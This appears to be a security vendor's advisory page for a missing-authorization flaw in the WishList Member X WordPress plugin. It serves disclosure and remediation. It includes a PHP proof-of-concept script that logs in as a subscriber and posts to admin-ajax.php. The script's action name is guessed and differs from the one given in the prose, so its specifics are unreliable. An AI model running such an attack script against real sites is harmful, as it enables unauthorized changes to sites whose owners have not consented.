Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-24575: WishList Member X <= 3.29.0 – Missing Authorization (wishlist-member-x)

Severity Medium (CVSS 4.3)
CWE 862
Vulnerable Version 3.29.0
Patched Version
Disclosed January 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24575 (metadata-based):
This vulnerability is a Missing Authorization flaw in the WishList Member X WordPress plugin, affecting versions up to and including 3.29.0. The flaw allows any authenticated user, including those with the lowest subscriber role, to perform an unauthorized action. The CVSS score of 4.3 (Medium) reflects a network-accessible attack with low attack complexity and low impact on integrity.

Atomic Edge research identifies the root cause as a missing capability check on a specific plugin function. The CWE-862 classification confirms the absence of a proper authorization mechanism. The vulnerability description indicates the flaw resides in a function accessible to authenticated users. Without code diffs, this conclusion is inferred from the CWE and the public description, which explicitly states a missing capability check.

Exploitation likely targets a WordPress AJAX handler or admin endpoint. Attackers would send a crafted POST request to `/wp-admin/admin-ajax.php` or `/wp-admin/admin-post.php`. The request would contain an `action` parameter corresponding to the vulnerable plugin function, such as `wishlist_member_x_action`. No nonce parameter would be required due to the missing authorization. A subscriber-level attacker would authenticate with valid WordPress credentials before sending the exploit request.

Remediation requires adding a proper capability check to the vulnerable function. The plugin must verify the current user has the necessary permissions, typically using `current_user_can()`, before executing privileged actions. The fix should also consider implementing a nonce check for additional CSRF protection, though the core issue is the missing authorization. The patched version was not available for analysis at the time of writing.

The impact of successful exploitation is unauthorized action execution. The CVSS vector indicates a low impact on integrity (I:L), suggesting the action may modify limited settings or data, but does not lead to full site compromise, data leakage (C:N), or service disruption (A:N). Atomic Edge analysis infers the action could alter plugin-specific configurations or user memberships, given the plugin’s purpose.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-24575 - WishList Member X <= 3.29.0 - Missing Authorization
<?php
/**
 * Proof of Concept for CVE-2026-24575.
 * This script demonstrates unauthorized action access in WishList Member X.
 * ASSUMPTIONS: The vulnerable endpoint is a WordPress AJAX handler.
 * The specific AJAX action name is inferred from the plugin slug.
 * A valid subscriber-level WordPress session cookie is required.
 */
$target_url = 'https://victim-site.com'; // CHANGE THIS
$username = 'subscriber_user'; // CHANGE THIS
$password = 'subscriber_pass'; // CHANGE THIS

// Step 1: Authenticate to obtain session cookies.
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Step 2: Send exploit request to the vulnerable AJAX endpoint.
// The exact action parameter is unknown; a common pattern is used.
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$exploit_data = array(
    'action' => 'wlmx_unauthorized_action' // INFERRED ACTION NAME
    // Additional plugin-specific parameters may be required but are unknown.
);
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));
$ajax_response = curl_exec($ch);
curl_close($ch);

// Step 3: Analyze response.
echo "Response from AJAX endpoint:n";
echo htmlspecialchars($ajax_response) . "n";
// A successful exploit may return a specific success message or JSON.
// Without knowing the exact function, the PoC demonstrates the attack vector.
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School